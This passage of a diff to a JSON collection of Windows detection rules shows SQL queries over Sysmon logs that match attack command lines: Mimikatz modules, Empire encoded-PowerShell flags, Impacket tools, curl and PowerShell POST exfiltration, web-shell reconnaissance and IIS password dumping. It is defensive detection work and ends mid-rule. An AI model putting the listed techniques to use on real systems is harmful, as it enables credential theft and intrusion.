"tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Other tools that incidentally use the same command line parameters" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%DumpCreds%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz%' ESCAPE '\\') OR (CommandLine LIKE '%::aadcookie%' ESCAPE '\\' OR CommandLine LIKE '%::detours%' ESCAPE '\\' OR CommandLine LIKE '%::memssp%' ESCAPE '\\' OR CommandLine LIKE '%::mflt%' ESCAPE '\\' OR CommandLine LIKE '%::ncroutemon%' ESCAPE '\\' OR CommandLine LIKE '%::ngcsign%' ESCAPE '\\' OR CommandLine LIKE '%::printnightmare%' ESCAPE '\\' OR CommandLine LIKE '%::skeleton%' ESCAPE '\\' OR CommandLine LIKE '%::preshutdown%' ESCAPE '\\' OR CommandLine LIKE '%::mstsc%' ESCAPE '\\' OR CommandLine LIKE '%::multirdp%' ESCAPE '\\') OR (CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%crypto::%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%process::%' ESCAPE '\\' OR CommandLine LIKE '%vault::%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -NoP -sta -NonI -W Hidden -Enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc %' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -W Hidden -enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc%' ESCAPE '\\' OR CommandLine LIKE '% -enc SQB%' ESCAPE '\\' OR CommandLine LIKE '% -nop -exec bypass -EncodedCommand %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_mimikatz_command_line.yml" + "filename": "proc_creation_win_hktl_empire_powershell_launch.yml" }, { - "title": "Sticky Key Like Backdoor Execution", - "id": "2fdefcb3-dbda-401e-ae23-f0db027628bc", + "title": "HackTool - Impacket Tools Execution", + "id": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", "status": "test", - "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", - "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", + "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.008", - "car.2014-11-003", - "car.2014-11-008" + "attack.execution", + "attack.t1557.001" ], "falsepositives": [ - "Unlikely" + "Legitimate use of the impacket tools" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wt.exe' ESCAPE '\\') AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%Magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%Narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%DisplaySwitch.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\goldenPac%' ESCAPE '\\' OR Image LIKE '%\\\\karmaSMB%' ESCAPE '\\' OR Image LIKE '%\\\\kintercept%' ESCAPE '\\' OR Image LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\rpcdump%' ESCAPE '\\' OR Image LIKE '%\\\\samrdump%' ESCAPE '\\' OR Image LIKE '%\\\\secretsdump%' ESCAPE '\\' OR Image LIKE '%\\\\smbexec%' ESCAPE '\\' OR Image LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\wmiexec%' ESCAPE '\\' OR Image LIKE '%\\\\wmipersist%' ESCAPE '\\') OR (Image LIKE '%\\\\atexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\dcomexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\dpapi\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\findDelegation\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetADUsers\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetNPUsers\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getPac\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getST\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getTGT\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetUserSPNs\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\ifmap\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\mimikatz\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\netview\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\nmapAnswerMachine\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\opdump\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\rdp\\_check\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sambaPipe\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\smbclient\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\smbserver\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sniffer\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sniff\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\split\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\ticketer\\_windows.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml" + "filename": "proc_creation_win_hktl_impacket_tools.yml" }, { - "title": "Potential Data Exfiltration Activity Via CommandLine Tools", - "id": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", + "title": "Webshell Detection With Command Line Keywords", + "id": "bed2a484-9348-4143-8a8a-b801c979301c", "status": "experimental", - "description": "Detects the use of various CLI utilities exfiltrating data via web requests", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND CommandLine LIKE '% -ur%' ESCAPE '\\' AND CommandLine LIKE '% -me%' ESCAPE '\\' AND CommandLine LIKE '% -b%' ESCAPE '\\' AND CommandLine LIKE '% POST %' ESCAPE '\\') OR (Image LIKE '%\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--ur%' ESCAPE '\\' AND (CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\'))) AND ((CommandLine LIKE '%ToBase64String%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%nltest%' ESCAPE '\\' OR CommandLine LIKE '%ifconfig%' ESCAPE '\\' OR CommandLine LIKE '%hostname%' ESCAPE '\\' OR CommandLine LIKE '%net view%' ESCAPE '\\' OR CommandLine LIKE '%qprocess%' ESCAPE '\\' OR CommandLine LIKE '%netstat%' ESCAPE '\\' OR CommandLine LIKE '%systeminfo%' ESCAPE '\\' OR CommandLine LIKE '%tasklist%' ESCAPE '\\' OR CommandLine LIKE '%sc query%' ESCAPE '\\') OR (CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((OriginalFileName IN ('net.exe', 'net1.exe') AND (CommandLine LIKE '% user %' ESCAPE '\\' OR CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% group %' ESCAPE '\\')) OR (OriginalFileName = 'ping.exe' AND CommandLine LIKE '% -n %' ESCAPE '\\') OR (CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%cd /d %' ESCAPE '\\') OR (OriginalFileName = 'wmic.exe' AND CommandLine LIKE '% /node:%' ESCAPE '\\') OR ((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\quser.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\pathping.exe' ESCAPE '\\' OR Image LIKE '%\\\\tracert.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\tasklist.exe' ESCAPE '\\') OR OriginalFileName IN ('whoami.exe', 'sysinfo.exe', 'quser.exe', 'ipconfig.exe', 'pathping.exe', 'tracert.exe', 'netstat.exe', 'schtasks.exe', 'VSSADMIN.EXE', 'wevtutil.exe', 'tasklist.exe')) OR (CommandLine LIKE '% Test-NetConnection %' ESCAPE '\\' OR CommandLine LIKE '%dir \\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_data_exfiltration_via_cli.yml" + "filename": "proc_creation_win_webshell_detection.yml" }, { - "title": "MpiExec Lolbin", - "id": "729ce0ea-5d8f-4769-9762-e35de441586d", + "title": "PUA - AdFind Suspicious Execution", + "id": "9a132afa-654e-11eb-ae93-0242ac130002", "status": "test", - "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects AdFind execution with common flags seen used during attacks", + "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218" + "attack.discovery", + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" ], "falsepositives": [ - "Unknown" + "Legitimate admin activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mpiexec.exe' ESCAPE '\\' OR Imphash = 'd8b52ef6aaa3a81501bdfff9dbb96217' OR Hashes LIKE '%IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217%' ESCAPE '\\') AND (CommandLine LIKE '% /n 1 %' ESCAPE '\\' OR CommandLine LIKE '% -n 1 %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_mpiexec.yml" + "filename": "proc_creation_win_pua_adfind_susp_usage.yml" }, { - "title": "Potential Privilege Escalation via Service Permissions Weakness", - "id": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", - "status": "test", - "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", - "author": "Teymur Kheirkhabarov", + "title": "Port Forwarding Attempt Via SSH", + "id": "327f48c1-a6db-4eb8-875a-f6981f1b0183", + "status": "experimental", + "description": "Detects suspicious SSH tunnel port forwarding to a local port", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1574.011" + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1572", + "attack.t1021.001", + "attack.t1021.004" ], "falsepositives": [ - "Unknown" + "Administrative activity using a remote port forwarding to a local port" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%services%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ServiceDll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')" ], - "filename": "proc_creation_win_registry_privilege_escalation_via_service_key.yml" + "filename": "proc_creation_win_ssh_port_forward.yml" }, { - "title": "Devtoolslauncher.exe Executes Specified Binary", - "id": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", - "status": "test", - "description": "The Devtoolslauncher.exe executes other binary", - "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", + "title": "PUA - Fast Reverse Proxy (FRP) Execution", + "id": "32410e29-5f94-4568-b6a3-d91a8adad863", + "status": "experimental", + "description": "Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", + "author": "frack113, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Legitimate use of devtoolslauncher.exe by legitimate user" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\devtoolslauncher.exe' ESCAPE '\\' AND CommandLine LIKE '%LaunchForDeploy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\frpc.exe' ESCAPE '\\' OR Image LIKE '%\\\\frps.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\frpc.ini%' ESCAPE '\\' OR (Hashes LIKE '%MD5=7D9C233B8C9E3F0EA290D2B84593C842%' ESCAPE '\\' OR Hashes LIKE '%SHA1=06DDC9280E1F1810677935A2477012960905942F%' ESCAPE '\\' OR Hashes LIKE '%SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C%' ESCAPE '\\') OR md5 = '7d9c233b8c9e3f0ea290d2b84593c842' OR sha1 = '06ddc9280e1f1810677935a2477012960905942f' OR sha256 = '57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c'))" ], - "filename": "proc_creation_win_lolbin_devtoolslauncher.yml" + "filename": "proc_creation_win_pua_frp.yml" }, { - "title": "Abuse of Service Permissions to Hide Services Via Set-Service", - "id": "514e4c3a-c77d-4cde-a00f-046425e2301e", + "title": "Microsoft IIS Service Account Password Dumped", + "id": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", + "author": "Tim Rauch, Janantha Marasinghe", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Rare intended use of hidden services" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND CommandLine LIKE '%list %' ESCAPE '\\') AND ((CommandLine LIKE '% /config%' ESCAPE '\\' OR CommandLine LIKE '% /xml%' ESCAPE '\\' OR CommandLine LIKE '% -config%' ESCAPE '\\' OR CommandLine LIKE '% -xml%' ESCAPE '\\') OR ((CommandLine LIKE '% /@t%' ESCAPE '\\' OR CommandLine LIKE '% /text%' ESCAPE '\\' OR CommandLine LIKE '% /show%' ESCAPE '\\' OR CommandLine LIKE '% -@t%' ESCAPE '\\' OR CommandLine LIKE '% -text%' ESCAPE '\\' OR CommandLine LIKE '% -show%' ESCAPE '\\') AND (CommandLine LIKE '%:\\*' ESCAPE '\\' OR CommandLine LIKE '%password%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_hide_services_via_set_service.yml" + "filename": "proc_creation_win_iis_appcmd_service_account_password_dumped.yml" }, { - "title": "PUA - 3Proxy Execution", - "id": "f38a82d2-fba3-4781-b549-525efbec8506", + "title": "UEFI Persistence Via Wpbbin - ProcessCreation", + "id": "4abc0ec4-db5a-412f-9632-26659cddf145", "status": "experimental", - "description": "Detects the use of 3proxy, a tiny free proxy server", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.persistence", + "attack.defense_evasion", + "attack.t1542.001" ], "falsepositives": [ - "Administrative activity" + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\3proxy.exe' ESCAPE '\\' OR Description = '3proxy - tiny proxy server' OR CommandLine LIKE '%.exe -i127.0.0.1 -p%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_3proxy_execution.yml" + "filename": "proc_creation_win_wpbbin_potential_persistence.yml" }, { - "title": "UAC Bypass Using Event Viewer RecentViews", - "id": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", + "title": "Proxy Execution via Wuauclt", + "id": "af77cf95-c469-471c-b6a0-946c685c4798", "status": "test", - "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation" + "attack.t1218", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\Event Viewer\\\\RecentViews%' ESCAPE '\\' OR CommandLine LIKE '%\\\\EventV~1\\\\RecentViews%' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%RunHandlerComServer%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /UpdateDeploymentProvider UpdateDeploymentProvider.dll %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_eventvwr_recentviews.yml" + "filename": "proc_creation_win_lolbin_wuauclt.yml" }, { - "title": "Winnti Malware HK University Campaign", - "id": "3121461b-5aa0-4a41-b910-66d25524edbb", - "status": "test", - "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", - "author": "Florian Roth (Nextron Systems), Markus Neis", + "title": "Renamed Office Binary Execution", + "id": "0b0cd537-fc77-4e6e-a973-e53495c1083d", + "status": "experimental", + "description": "Detects the execution of a renamed office binary", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0044" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR ParentImage LIKE '%\\\\hpqhvind.exe%' ESCAPE '\\') AND Image LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\' AND Image LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\Test.exe' ESCAPE '\\' AND Image LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR Image LIKE 'C:\\\\ProgramData\\\\DRM\\\\CLR\\\\CLR.exe' ESCAPE '\\' OR (ParentImage LIKE 'C:\\\\ProgramData\\\\DRM\\\\Windows%' ESCAPE '\\' AND Image LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('Excel.exe', 'MSACCESS.EXE', 'OneNote.exe', 'POWERPNT.EXE', 'WinWord.exe') OR Description IN ('Microsoft Access', 'Microsoft Excel', 'Microsoft OneNote', 'Microsoft PowerPoint', 'Microsoft Word')) AND NOT ((Image LIKE '%\\\\EXCEL.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR Image LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR Image LIKE '%\\\\POWERPNT.EXE' ESCAPE '\\' OR Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml" + "filename": "proc_creation_win_renamed_office_processes.yml" }, { - "title": "Remote Access Tool - Anydesk Execution From Suspicious Folder", - "id": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", - "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "Florian Roth (Nextron Systems)", + "title": "Execution via stordiag.exe", + "id": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", + "status": "test", + "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", + "author": "Austin Songer (@austinsonger)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate use of AnyDesk from a non-standard folder" + "Legitimate usage of stordiag.exe." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH') AND NOT ((Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%Program Files (x86)\\\\AnyDesk%' ESCAPE '\\' OR Image LIKE '%Program Files\\\\AnyDesk%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\stordiag.exe' ESCAPE '\\' AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\fltmc.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'c:\\\\windows\\\\system32\\\\%' ESCAPE '\\' OR ParentImage LIKE 'c:\\\\windows\\\\syswow64\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_remote_access_tools_anydesk_susp_exec.yml" + "filename": "proc_creation_win_stordiag_susp_child_process.yml" }, { - "title": "Suspicious RDP Redirect Using TSCON", - "id": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", + "title": "Script Interpreter Execution From Suspicious Folder", + "id": "1228c958-e64e-4e71-92ad-7d429f4138ba", "status": "test", - "description": "Detects a suspicious RDP session redirect using tscon.exe", + "description": "Detects a suspicious script executions in temporary folders or folders accessible by environment variables", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1563.002", - "attack.t1021.001", - "car.2013-07-002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /dest:rdp-tcp:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 